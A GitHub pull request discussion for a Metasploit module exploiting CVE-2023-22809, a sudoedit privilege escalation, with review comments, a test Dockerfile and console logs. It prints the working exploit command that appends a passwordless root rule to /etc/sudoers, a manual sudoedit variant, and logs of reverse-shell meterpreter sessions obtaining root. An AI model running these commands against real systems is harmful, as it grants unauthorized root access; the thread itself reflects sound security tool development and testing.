Linux sudoedit priv esc (CVE-2023-22809)
rapid7/metasploit-framework pull request #17929
Opened 2023-04-25 08:43 UTC by h00die

This PR adds an exploit for cve-2023-22809, a sudoedit priv esc on linux based systems. 

Still in draft while I add documentation and do some final testing.

## Verification

- [ ] Start `msfconsole`
- [ ] `use exploit/windows/smb/ms08_067_netapi`
- [ ] ...
- [ ] **Verify** the thing does what it should
- [ ] **Verify** the thing does not do what it should not
- [ ] **Document** the thing and how it works ([Example](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/multi/gather/aws_keys.md))

2023-04-26 00:16 UTC, jvoisin commented on modules/exploits/linux/local/sudoedit_bypass_priv_esc.rb
> +    package = cmd_exec('dpkg -l sudo | grep \'^ii\'')
Why `dpkg`? The exploit should work on any Linux distribution.

2023-04-26 00:16 UTC, jvoisin commented on modules/exploits/linux/local/sudoedit_bypass_priv_esc.rb
> +    command = "EDITOR=\"sed -i -e '$ a `whoami` ALL=(ALL:ALL) NOPASSWD: /bin/sh \# #{@flag}' -- /etc/sudoers\" sudo -S -e #{get_editable_file}"
`-i` is specific to gnu's sed, and might not work everywhere.

2023-04-26 00:37 UTC, h00die commented on modules/exploits/linux/local/sudoedit_bypass_priv_esc.rb
> +    package = cmd_exec('dpkg -l sudo | grep \'^ii\'')
It's true, any anyone could just do auto check false. Mainly, I didn't care to look up all the back porting from other oses and code in the package manager listing stuff. If people want to expand this later on, they're more than free to

2023-04-26 00:38 UTC, h00die commented on modules/exploits/linux/local/sudoedit_bypass_priv_esc.rb
> +    command = "EDITOR=\"sed -i -e '$ a `whoami` ALL=(ALL:ALL) NOPASSWD: /bin/sh \# #{@flag}' -- /etc/sudoers\" sudo -S -e #{get_editable_file}"
I'm willing to risk it. In the yet to be released MD I explain trying other strategies and how/why they didn't work. Again, if anyone wants to add in a new/better strategy, that'd be great!

2023-04-26 01:38 UTC, bcoles commented on modules/exploits/linux/local/sudoedit_bypass_priv_esc.rb
> +    package = cmd_exec('dpkg -l sudo | grep \'^ii\'')
I'd use `sudo --version` as a fall back. It will yield false positives but will be far more reliable across distros.

`dpkg` will work only on the Debian family of distros. If you really want to use `dpkg` ensure the response is validated before parsing with `Rex::Version.new` else it will crash.

2023-04-26 15:50 UTC, smcintyre-r7 requested changes

2023-04-26 19:56 UTC, h00die commented on modules/exploits/linux/local/sudoedit_bypass_priv_esc.rb
> +      fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override'
Looks like the example needs updating (it does bad): https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/example_linux_priv_esc.rb#L124

2023-04-27 14:11 UTC, dwelch-r7 commented on modules/exploits/linux/local/sudoedit_bypass_priv_esc.rb
> +    editable_file = cmd_exec('sudo -l -S | grep -E "sudoedit|sudo -e" | grep -E "(root)" | rev | cut -d " " -f 1 | rev')
```suggestion
    editable_file = cmd_exec('sudo -l -S')
```
Would we be able to change this and then do the grepping/reversing in ruby?

2023-04-27 14:11 UTC, dwelch-r7 commented on modules/exploits/linux/local/sudoedit_bypass_priv_esc.rb
> +    timeout = 60
Would it make sense for this to be a datastore option?

2023-04-27 14:13 UTC, adfoster-r7 commented on modules/exploits/linux/local/sudoedit_bypass_priv_esc.rb
To the tester; We should verify the behavior in different minimal docker containers to make sure there's no crashes when binaries such as `dpkg` missing

2023-04-27 19:30 UTC, h00die commented
pushing this back to draft,  going to check it against some other OSes.  I have some updates and got it to properly check Fedora (22), but exploitation of it fails

2023-05-05 20:49 UTC, h00die commented
Should be ready for review. works on 22.10 now, documented. much better check methods as well.

The difficulty of this exploit, for future travelers, is that we need it to be non-interactive.  All the exploits I've seen so far are interactive, opening `vi` and asking the user to add a line.  However with MSF we can't do that.  The implemented methodology was the only way I can find to get a non-interactive method, and it only seem to work on Ubuntu 22.04-22.10 (didn't try newer).  While other OSes may be vulnerable, someone will need to research a method to exploit that in a non-interactive way.

2023-05-08 21:03 UTC, smcintyre-r7 requested changes
I'm seeing failed attempts on Ubuntu 22.10 with `1.9.11p3-1ubuntu1` using a `meterpreter x64/linux` session type. FWIW, I think the issue is that it's incorrectly identifying `[sudo] password for smcintyre:` as an editable file.

<details>
<summary>Testing Output</summary>

```
msf6 exploit(linux/local/sudoedit_bypass_priv_esc) > run

[*] Started reverse TCP handler on 192.168.250.134:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] sudo version 1.9.11p3.pre.1ubuntu1 is vulnerable
[+] The target is vulnerable. Sudo 1.9.11p3.pre.1ubuntu1 is vulnerable, can edit: [sudo] password for smcintyre:
[*] Writing '/tmp/.mIC6cQR' (250 bytes) ...
[*] Adding user to sudoers
[*] Executing command: EDITOR="sed -i -e '$ a `whoami` ALL=(ALL:ALL) NOPASSWD: /bin/sh # jWebDRs6SpUh' -- /etc/sudoers" sudo -S -e [sudo] password for smcintyre:
[*] [sudo] password for smcintyre: 
[*] Spawning payload
[*] [sudo] password for smcintyre: 
[*] Exploit completed, but no session was created.
msf6 exploit(linux/local/sudoedit_bypass_priv_esc) > sessions

Active sessions
===============

  Id  Name  Type                   Information                 Connection
  --  ----  ----                   -----------                 ----------
  1         meterpreter x64/linux  smcintyre @ 192.168.159.21  192.168.159.128:4444 -> 192.168.159.21:46734 (192.168.159.21)

msf6 exploit(linux/local/sudoedit_bypass_priv_esc) > 
```
</details>

I also tested on an Ubuntu 20.04 docker container which appeared to have multiple problems.

<details>
<summary>Docker Setup</summary>

I used this Dockerfile:

```
# Build Ubuntu image with base functionality.
FROM ubuntu:focal AS ubuntu-base
ENV DEBIAN_FRONTEND noninteractive
SHELL ["/bin/bash", "-o", "pipefail", "-c"]

# Setup the default user.
RUN useradd -rm -d /home/ubuntu -s /bin/bash -g root -G sudo ubuntu
RUN echo 'ubuntu:ubuntu' | chpasswd
USER ubuntu
WORKDIR /home/ubuntu

# Build image with Python and SSHD.
FROM ubuntu-base AS ubuntu-with-sshd
USER root

# Install required tools.
RUN apt-get -qq update \
    && apt-get -qq --no-install-recommends install vim-tiny=2:8.1.* \
    && apt-get -qq --no-install-recommends install sudo=1.8.* \
    && apt-get -qq --no-install-recommends install python3-pip=20.0.* \
    && apt-get -qq --no-install-recommends install openssh-server=1:8.* \
    && apt-get -qq clean    \
    && rm -rf /var/lib/apt/lists/*

# Configure SSHD.
# SSH login fix. Otherwise user is kicked off after login
RUN sed 's@session\s*required\s*pam_loginuid.so@session optional pam_loginuid.so@g' -i /etc/pam.d/sshd
RUN mkdir /var/run/sshd
RUN bash -c 'install -m755 <(printf "#!/bin/sh\nexit 0") /usr/sbin/policy-rc.d'
RUN ex +'%s/^#\zeListenAddress/\1/g' -scwq /etc/ssh/sshd_config
RUN ex +'%s/^#\zeHostKey .*ssh_host_.*_key/\1/g' -scwq /etc/ssh/sshd_config
RUN RUNLEVEL=1 dpkg-reconfigure openssh-server
RUN ssh-keygen -A -v
RUN update-rc.d ssh defaults

# Configure sudo.
RUN ex +"%s/^%sudo.*$/%sudo ALL=(ALL:ALL) NOPASSWD:ALL/g" -scwq! /etc/sudoers

# Generate and configure user keys.
USER ubuntu
RUN ssh-keygen -t ed25519 -f ~/.ssh/id_ed25519
#COPY --chown=ubuntu:root "./files/authorized_keys" /home/ubuntu/.ssh/authorized_keys

# Setup default command and/or parameters.
EXPOSE 22
CMD ["/usr/bin/sudo", "/usr/sbin/sshd", "-D", "-o", "ListenAddress=0.0.0.0"]
```

I then used `docker exec` to start bash within the container. I set a password for myself, downgraded sudo using `sudo apt-get install sudo=1.8.31-1ubuntu1` and updated `/etc/sudoers` to the following contents.

The `/etc/sudoers` file looks like the following:
```
#
# This file MUST be edited with the 'visudo' command as root.
#
# Please consider adding local content in /etc/sudoers.d/ instead of
# directly modifying this file.
#
# See the man page for details on how to write a sudoers file.
#
Defaults	env_reset
Defaults	mail_badpass
Defaults	secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin"

# Host alias specification

# User alias specification

# Cmnd alias specification

# User privilege specification
root	ALL=(ALL:ALL) ALL

# Members of the admin group may gain root privileges
%admin ALL=(ALL) ALL

# Allow members of group sudo to execute any command
%sudo ALL=(ALL:ALL) ALL
%sudo ALL=(ALL:ALL) NOPASSWD: sudoedit /etc/motd
# See sudoers(5) for more information on "#include" directives:

#includedir /etc/sudoers.d
```
</details>

First, it once again failed to identify a writable file. It originally reported the following despite me adding `%sudo ALL=(ALL:ALL) NOPASSWD: sudoedit /etc/motd` to `/etc/sudoers`  as was implied necessary by [this resource](https://medium.com/@dev.nest/how-to-bypass-sudo-exploit-cve-2023-22809-vulnerability-296ef10a1466) which you referenced.

```
msf6 exploit(linux/local/sudoedit_bypass_priv_esc) > check

[+] sudo version 1.8.31.pre.1ubuntu1 is vulnerable
[*] The target appears to be vulnerable. Sudo 1.8.31.pre.1ubuntu1 is vulnerable, but unable to determine editable file. OS can NOT be exploited by this module
```

Now this time I explicitly set `EDITABLEFILE` to be `/etc/motd` to see if that'd fix things. It did not. With that setting in place, it still failed. This is the output:

```
msf6 exploit(linux/local/sudoedit_bypass_priv_esc) > run EDITABLEFILE=/etc/motd VERBOSE=true

[*] Started reverse TCP handler on 192.168.250.134:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] sudo version 1.8.31.pre.1ubuntu1 is vulnerable
[*] Using user defined EDITABLEFILE: /etc/motd
[+] The target is vulnerable. Sudo 1.8.31.pre.1ubuntu1 is vulnerable, can edit: /etc/motd. OS can NOT be exploitabed by this module
[*] Using user defined EDITABLEFILE: /etc/motd
[*] Writing '/tmp/.pXR6evw0' (250 bytes) ...
[*] Adding user to sudoers
[*] Using user defined EDITABLEFILE: /etc/motd
[*] Executing command: EDITOR="sed -i -e '$ a `whoami` ALL=(ALL:ALL) NOPASSWD: /bin/sh # 5r8YlitBJxpQ' -- /etc/sudoers" sudo -S -e /etc/motd
[-] Exploit aborted due to failure: no-target: Failed to edit sudoers, command was unsuccessful
[*] Exploit completed, but no session was created.
msf6 exploit(linux/local/sudoedit_bypass_priv_esc) > 
```

After this failed, I attempted to exploit the vulnerability manually by running `EDITOR="vi -- /etc/passwd" sudoedit /etc/motd` as suggested in the blog. I was prompted to edit the `/etc/passwd` file leading me to believe it was successful.

2023-05-13 19:21 UTC, h00die commented on modules/exploits/linux/local/sudoedit_bypass_priv_esc.rb
> +    return datastore['EDITABLEFILE'] if datastore['EDITABLEFILE']
good call on this.

2023-05-13 19:28 UTC, h00die commented
so part of what you experienced is the 'is this scriptable' problem with this exploit.  While 20.04 is exploitable in a manual fashion (opening VI like you did and editing the file manually), I haven't figured out a way you could script it to append data to the file.  This is called out in `[+] The target is vulnerable. Sudo 1.8.31.pre.1ubuntu1 is vulnerable, can edit: /etc/motd. OS can NOT be exploitedby this module` however, the module should bail instead of keep going.

2023-05-13 19:49 UTC, h00die commented
This module should now fail/exit more appropriately now on unexploitable systems or with incorrect configurations (non-editable files)

2023-05-15 20:36 UTC, smcintyre-r7 reviewed
Alright retested and the module is failing now on systems other than Ubuntu 22.04 and 22.10. I just left one comment about the `#get_editable_file` function failing because of the `grep -E (root)` part.

Tested with a Linux Meterpreter as well as a shell session. Both worked once the EDITABLEFILE issue was worked out.

<details>
<summary>Testing Output</summary>

```
msf6 exploit(multi/ssh/sshexec) > show options 

Module options (exploit/multi/ssh/sshexec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  Password1!       yes       The password to authenticate with.
   RHOSTS    192.168.159.21   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT     22               yes       The target port (TCP)
   SSL       false            no        Negotiate SSL for incoming connections
   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                    no        The URI to use for this exploit (default is random)
   USERNAME  smcintyre        yes       The user to authenticate as.


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (linux/x64/shell/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux x64



View the full module info with the info, or info -d command.

msf6 exploit(multi/ssh/sshexec) > run

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.21:22 - Sending stager...
[*] Command Stager progress -  46.74% done (402/860 bytes)
[*] Sending stage (38 bytes) to 192.168.159.21
[*] Command Stager progress - 100.00% done (860/860 bytes)
[*] Command shell session 5 opened (192.168.159.128:4444 -> 192.168.159.21:39066) at 2023-05-15 16:19:45 -0400




id
uid=1000(smcintyre) gid=1000(smcintyre) groups=1000(smcintyre),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
^Z
Background session 5? [y/N]  y
msf6 exploit(multi/ssh/sshexec) > previous 
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/sudoedit_bypass_priv_esc) > show options 

Module options (exploit/linux/local/sudoedit_bypass_priv_esc):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  -1               yes       The session to run this module on


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Auto



View the full module info with the info, or info -d command.

msf6 exploit(linux/local/sudoedit_bypass_priv_esc) > run

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Sudo 1.9.11p3.pre.1ubuntu1 is vulnerable, can edit: /etc/motd
[*] Writing '/tmp/.BOJ4zDO' (250 bytes) ...
[*] Adding user to sudoers
[*] Spawning payload
[*] Sending stage (3045348 bytes) to 192.168.159.21
[*] Meterpreter session 6 opened (192.168.159.128:4444 -> 192.168.159.21:59332) at 2023-05-15 16:20:13 -0400

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.159.21
OS           : Ubuntu 22.10 (Linux 5.19.0-41-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
```
</details>

2023-05-15 20:36 UTC, smcintyre-r7 commented on modules/exploits/linux/local/sudoedit_bypass_priv_esc.rb
> +    editable_file = cmd_exec('sudo -l -S | grep -E "sudoedit|sudo -e" | grep -E "(root)" | rev | cut -d " " -f 1 | rev')
The `| grep -E "(root)"` part is causing this method to fail to identify an editable file on my test system.

The line in `/etc/sudoers` is `%sudo ALL=(ALL:ALL) NOPASSWD: sudoedit /etc/motd`.

2023-05-16 20:19 UTC, h00die commented
I don't remember why my grep command differed from the POCs, but I've switched it back and it seems to catch my typical use case (username) and yours (%sudo).  Tested both on 22.04, seems to be working correctly now

2023-05-23 13:17 UTC, smcintyre-r7 approved these changes
It's working on Ubuntu 22.10 now with the new regex.

```
msf6 exploit(linux/local/sudoedit_bypass_priv_esc) > run

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Sudo 1.9.11p3.pre.1ubuntu1 is vulnerable, can edit: /etc/motd
[*] Writing '/tmp/.h2LAT' (250 bytes) ...
[*] Adding user to sudoers
[*] Spawning payload
[*] Sending stage (3045348 bytes) to 192.168.159.21
[*] Meterpreter session 2 opened (192.168.159.128:4444 -> 192.168.159.21:36472) at 2023-05-23 09:16:00 -0400

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.159.21
OS           : Ubuntu 22.10 (Linux 5.19.0-41-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 
```

2023-05-23 13:31 UTC, merged

2023-05-23 13:35 UTC, smcintyre-r7 commented
# Release Notes
This adds an exploit for CVE-2023-22809, an LPE within sudoedit. The exploit currently only supports Ubuntu 22.04 and 22.10.